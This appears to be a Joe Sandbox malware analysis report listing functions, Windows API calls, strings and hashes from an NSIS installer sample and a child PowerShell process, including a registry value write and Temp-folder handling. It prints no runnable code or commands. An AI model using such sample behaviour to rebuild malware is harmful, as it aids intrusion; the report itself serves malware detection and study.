Opcode ID: 8f57c4960d5009b47da13ac1dbf9672dc76c0f1a0d468b1b2fcc5bc99a892ac9
Instruction ID: 90968196233f782bf8ff3785c90d26ea0bd53ded382d002e8ee2e27c6658862d
Opcode Fuzzy Hash: 8f57c4960d5009b47da13ac1dbf9672dc76c0f1a0d468b1b2fcc5bc99a892ac9
Instruction Fuzzy Hash: 6121C171948209AEEF05EFA5CE4AABE7BB4EF84308F14443EF502B61D0D7B84541DB28

Function 004023DE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(formagen\Uninstall\frustulose,00000023,00000011,00000002), ref: 00402429
RegSetValueExW.ADVAPI32(?,?,?,?,formagen\Uninstall\frustulose,00000000,00000011,00000002), ref: 00402469
RegCloseKey.ADVAPI32(?,?,?,formagen\Uninstall\frustulose,00000000,00000011,00000002), ref: 00402551

Strings

formagen\Uninstall\frustulose, xrefs: 0040241A, 00402428, 0040243F, 00402453, 0040245E

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: formagen\Uninstall\frustulose
API String ID: 2655323295-3782588226
Opcode ID: e0ba1c3f19a560f8adc54ad1fb532bdf1398b76f1af8679a0db12c8548dab9a8
Instruction ID: 1eab41df84c6b24c6b923ea001d17cdc0cfdc7d4c8a499a75fdfc4da8179f3fa
Opcode Fuzzy Hash: e0ba1c3f19a560f8adc54ad1fb532bdf1398b76f1af8679a0db12c8548dab9a8
Instruction Fuzzy Hash: A1118171E00108AFEB10AFA5DE49EAEBAB4EB54354F11803AF504F71D1DBB84D459B58

Function 00405C81 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403476,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004036D5,?,00000006,00000008,0000000A), ref: 00405C87
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403476,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004036D5,?,00000006,00000008,0000000A), ref: 00405C91
lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405CA3

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405C81

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-4083868402
Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
Instruction ID: 792cc20aee96bfe2db1a273563d78520df22e3750eb0c1a77993888458b10d09
Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
Instruction Fuzzy Hash: DBD0A731111631AAC1116B458D05CDF769C9F46315342143BF501B30A1C77C1D6187FD

Function 00402D2A Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
RegCloseKey.ADVAPI32(?), ref: 00402D98
RegCloseKey.ADVAPI32(?), ref: 00402DB9

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: 589b69b30b93e72d379e73a42f84ccf1a961e1a5d2401dd27ca86d8d7f2ff702
Instruction ID: 0f4b1bf7762f76a333ccd5711aab570045f86c75fcf3a50f9e11fcc9d843940a
Opcode Fuzzy Hash: 589b69b30b93e72d379e73a42f84ccf1a961e1a5d2401dd27ca86d8d7f2ff702
Instruction Fuzzy Hash: 21116A32540509FBDF129F90CE09BEE7B69EF58344F110076B905B50E0E7B5DE21AB68

Function 00405D89 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004063B0: lstrcpynW.KERNEL32(?,?,00000400,0040355A,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063BD

Part of subcall function 00405D2C: CharNextW.USER32(?,?,00425F30,?,00405DA0,00425F30,00425F30,?,?,75572EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405D3A
Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D3F
Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D57

lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,75572EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405DE2
GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,75572EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,75572EE0), ref: 00405DF2

Strings

0_B, xrefs: 00405D8F

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: 0_B
API String ID: 3248276644-2128305573
Opcode ID: 9ab52294f1c51de88c4a4db8473d9fc5f5165192c0b0c0d383058277ec03ae92
Instruction ID: 7d5bbe1e5c8c3abe72dbe24b1e5e7d34393fbb328f3a5d3c645332532cfc401b
Opcode Fuzzy Hash: 9ab52294f1c51de88c4a4db8473d9fc5f5165192c0b0c0d383058277ec03ae92
Instruction Fuzzy Hash: 61F0D125114E6156E62232364D0DBAF1954CE8236474A853BFC51B22D1DB3C8953CDAE

Function 00405388 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004053B7
CallWindowProcW.USER32(?,?,?,?), ref: 00405408

Part of subcall function 00404391: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A3

Strings

, xrefs: 00405398

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 7f0b268359981ce96b8471a5d3c832aa899a6e6df9d4a1bd192212e4a6da3699
Instruction ID: e7a51b5005e981c4ca122d20ba3fe12824fd99f760bfe42b36e815d14bf77052
Opcode Fuzzy Hash: 7f0b268359981ce96b8471a5d3c832aa899a6e6df9d4a1bd192212e4a6da3699
Instruction Fuzzy Hash: 5C01717120060DABDF209F11DD84AAB3735EB84395F204037FE457A1D1C7BA8D92AF69

Function 00403A29 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75572EE0,00403A00,75573420,004037FF,00000006,?,00000006,00000008,0000000A), ref: 00403A43
GlobalFree.KERNEL32(?), ref: 00403A4A

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403A3B

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-4083868402
Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
Instruction ID: 78aecf43d79df039942bc1d46619d1d902388d1bf991e2316d5006033f35a71e
Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
Instruction Fuzzy Hash: D9E08C32A000205BC6229F45ED04B5E7B6C6F48B22F0A023AE8C07B26087745C82CF88

Function 00405CCD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402F80,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003), ref: 00405CD3
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F80,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003), ref: 00405CE3

Strings

C:\Users\user\Desktop, xrefs: 00405CCD

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-1876063424
Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
Instruction ID: 4c3d9e560c0c996ae094f7ef7b1b4ed865fc8cc67bffad09b41611580a74fc2a
Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
Instruction Fuzzy Hash: 03D05EB2414A209AD3126704DD01D9F73A8EF12314746442AE841A6161E7785C918AAC

Function 00405E07 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E17
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E2F
CharNextA.USER32(00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E40
lstrlenA.KERNEL32(00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E49

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
Instruction ID: dc3323509655add47458b7bfdc28b409d7665b879035d0867add309d4545c2bc
Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
Instruction Fuzzy Hash: 89F06236104518EFC7029BA5DD40D9FBBA8EF06354B2540BAE980F7211D674DF01AB99

Analysis Process: powershell.exePID: 1568, Parent PID: 752COMMON

Executed Functions

Function 0501DFE0 Relevance: .7, Instructions: 714COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1638612548.0000000005010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5010000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77fd41858859fe0b4c9e80e72eec6cecd4d2f18d98bcabb8469c096a21ed3f50
Instruction ID: fecc16614830334c4278aefb69a8822e1ed4c15591d4512f1540ff43de0ebeee
Opcode Fuzzy Hash: 77fd41858859fe0b4c9e80e72eec6cecd4d2f18d98bcabb8469c096a21ed3f50
Instruction Fuzzy Hash: DE528D34A00319CFDB64DB64E854BADBBFBBF85204F1440A9DD06EB254EB309986CF56

Function 07C0C86F Relevance: 6.0, Strings: 4, Instructions: 993COMMON

Download Yara Rule

Strings

4l, xrefs: 07C0D44E
(fl, xrefs: 07C0D75B
4l, xrefs: 07C0D444
(fl, xrefs: 07C0D771

Memory Dump Source

Source File: 00000002.00000002.1644746898.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c00000_powershell.jbxd

Similarity

API ID:
String ID: (fl$(fl$4l$4l
API String ID: 0-1123208215
Opcode ID: 6fb23a32c0a603d5f651c1a4cf54ea47b77907a01b52bbd7e5df45c844654b23
Instruction ID: 976ecafff4ba9910bd58b53ab4058d94615dafa2da6a4971509c2e9a67676536
Opcode Fuzzy Hash: 6fb23a32c0a603d5f651c1a4cf54ea47b77907a01b52bbd7e5df45c844654b23
Instruction Fuzzy Hash: CE921CB4B003189FD724DF94C850BAAB7B2AB8A314F10C199D9096F795DB72ED81CF91

Function 07C04D68 Relevance: 3.6, Strings: 2, Instructions: 1056COMMON

Download Yara Rule

Strings

(fl, xrefs: 07C05C3C
(fl, xrefs: 07C05C32

Memory Dump Source

Source File: 00000002.00000002.1644746898.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c00000_powershell.jbxd

Similarity

API ID:
String ID: (fl$(fl
API String ID: 0-1194790885
Opcode ID: d498a0b426afd49919033a235ede59272d2f1c3aa096a12bc1770e67e3334881
Instruction ID: 4ddd1f4ae2e3e0ab09b870917339f7c8f9537cfd7144037fd7ac3301b73e180c
Opcode Fuzzy Hash: d498a0b426afd49919033a235ede59272d2f1c3aa096a12bc1770e67e3334881
Instruction Fuzzy Hash: B7A26BB0B10214DFD714CFA4D454FAABBB2AB8A314F248169D9056F786CB72ED42CF91

Function 07C0D23F Relevance: 2.9, Strings: 2, Instructions: 425COMMON

Download Yara Rule

Strings

(fl, xrefs: 07C0D75B
4l, xrefs: 07C0D444

Memory Dump Source

Source File: 00000002.00000002.1644746898.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c00000_powershell.jbxd

Similarity

API ID:
String ID: (fl$4l
API String ID: 0-1226780388
Opcode ID: 2312bce5a5ce69d0e33b248fc1578300838eef5a44c99c6ae8035da40264f418
Instruction ID: be6b30afc35c14a5da8de321ce60fbdea241becdfa94d566b43cace476342458
Opcode Fuzzy Hash: 2312bce5a5ce69d0e33b248fc1578300838eef5a44c99c6ae8035da40264f418
Instruction Fuzzy Hash: 651208B4B00315DFD724CB94C884BAAB7B2BB86314F10C195D90A6B795CB72EE81CF91

Function 07C04450 Relevance: 2.9, Strings: 2, Instructions: 373COMMON

Download Yara Rule

Strings

(fl, xrefs: 07C0457B
(fl, xrefs: 07C04571

Memory Dump Source

Source File: 00000002.00000002.1644746898.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c00000_powershell.jbxd

Similarity

API ID:
String ID: (fl$(fl
API String ID: 0-1194790885
Opcode ID: 3bad101c7a7721a4d341a8f97b59f92925ba79f8c8d040c5ca86331027085b17
Instruction ID: fbbcd9b0bf93b3b90025b9d7aca12f09e7b02e27e0f0f47ffa9d74c4d1fcba65
Opcode Fuzzy Hash: 3bad101c7a7721a4d341a8f97b59f92925ba79f8c8d040c5ca86331027085b17
Instruction Fuzzy Hash: 00E1BFB0B002059FD718DFA8C454BAEBBB2ABCA315F24C429D9056F395CB31EE418BD1

Function 07C0D229 Relevance: 2.8, Strings: 2, Instructions: 331COMMON

Download Yara Rule

Strings

(fl, xrefs: 07C0D75B
4l, xrefs: 07C0D444

Memory Dump Source

Source File: 00000002.00000002.1644746898.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c00000_powershell.jbxd

Similarity

API ID:
String ID: (fl$4l
API String ID: 0-1226780388
Opcode ID: e822f62dd000f004486c577366f93071189e6ecc87c077fccb0d05f3ddf4676a
Instruction ID: b2a42f5aa6aea04dcad3450fa185eae296dc9741f7ea914238bf153c01367da7
Opcode Fuzzy Hash: e822f62dd000f004486c577366f93071189e6ecc87c077fccb0d05f3ddf4676a
Instruction Fuzzy Hash: 09E109B4B00319DFD764CB54C884BAAB7B2BB86304F10C1D5D90A6B785CB72AE81CF91

Function 07C07EA8 Relevance: 1.8, Strings: 1, Instructions: 579COMMON

Download Yara Rule

Strings

_, xrefs: 07C0807D

Memory Dump Source

Source File: 00000002.00000002.1644746898.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c00000_powershell.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: c4ec34d5807aa5f968df3d11da68396dcba37d33f76107c3ed04037bd050700e
Instruction ID: eba884fa750696e66d203a2deb003056c9d77db2cba26a76bbae4377c746f1e2
Opcode Fuzzy Hash: c4ec34d5807aa5f968df3d11da68396dcba37d33f76107c3ed04037bd050700e
Instruction Fuzzy Hash: E61248B17043158FDB159B6898517AABBF2AFC6215F24C0BAD905CB7C2DB31CA42C7E1

Function 07C0444E Relevance: 1.5, Strings: 1, Instructions: 291COMMON

Download Yara Rule

Strings

(fl, xrefs: 07C04571

Memory Dump Source

Source File: 00000002.00000002.1644746898.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c00000_powershell.jbxd

Similarity

API ID:
String ID: (fl
API String ID: 0-423539152
Opcode ID: 1f929c4da3b9d54be8518adb475856775c858122402ab11867db3fded14b61a9
Instruction ID: 1f477e4d7690478c374fbe165441eb6293b4099d8ba9a95b5157527ae7b6e824
Opcode Fuzzy Hash: 1f929c4da3b9d54be8518adb475856775c858122402ab11867db3fded14b61a9
Instruction Fuzzy Hash: 13C1A2B4B002459FDB18CF94D484BAEBBB2AB8A314F24C559DA056F395CB31EE41CBD1

Function 07C04D4A Relevance: .8, Instructions: 849COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1644746898.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 072252a73c98402a8850228e9eb77388a31d8598a7b29e080365a97fa995d171
Instruction ID: fba38d71e03ab98bd47e4404ef8c0ed1831a80929d391b16fe8fef6c1c88a246
Opcode Fuzzy Hash: 072252a73c98402a8850228e9eb77388a31d8598a7b29e080365a97fa995d171
Instruction Fuzzy Hash: 61826BB4A10214DFD714CFA4D484FA9BBB2BB46318F248169D9056F786CB72EE42CF91

Function 07C01228 Relevance: .8, Instructions: 750COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1644746898.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 570149b67e88893d2eedb7282c8038b7da6a2f1af39b51ef22c795269a3aa03c
Instruction ID: 5903c68f4e4c621c79c9fc84d957545cd5b742fce2fb2ef2fbe4ae4aafad44d7
Opcode Fuzzy Hash: 570149b67e88893d2eedb7282c8038b7da6a2f1af39b51ef22c795269a3aa03c
Instruction Fuzzy Hash: 4852A1B0B003599FD714DB98D491BAEBBB2AB86314F18C069E9059F391CB72DD41CBD1

Function 07C040A0 Relevance: .6, Instructions: 644COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1644746898.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e096205d0fb2a0817c116183e2bf6d3b2816962d7c1cd32f13c683f2b7057e22
Instruction ID: 107a8c147aeb690f951f99b88472de56d4fc04f06865169a7d60920887c875f9
Opcode Fuzzy Hash: e096205d0fb2a0817c116183e2bf6d3b2816962d7c1cd32f13c683f2b7057e22
Instruction Fuzzy Hash: 2D522BB4B003549FDB14CB58D880B6AB7B2BB89714F14C0D9DA099F395DB72EE81CB91

Function 07C0D0B9 Relevance: .6, Instructions: 620COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1644746898.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8dd63977179c419d19958fba1997d578e6fb89db0eda4184ad092d921731d950
Instruction ID: 110b10fdab266a0713424d59d9042efb74bc31138b2752cb4a2fef301c13d2e7
Opcode Fuzzy Hash: 8dd63977179c419d19958fba1997d578e6fb89db0eda4184ad092d921731d950
Instruction Fuzzy Hash: 1A422CB4B003149FD714DF58C850BAAB7B2AB8A314F50C099E9095F795DB72ED828F91

Function 07C03798 Relevance: .6, Instructions: 604COMMON

Download Yara Rule

Memory Dump Source

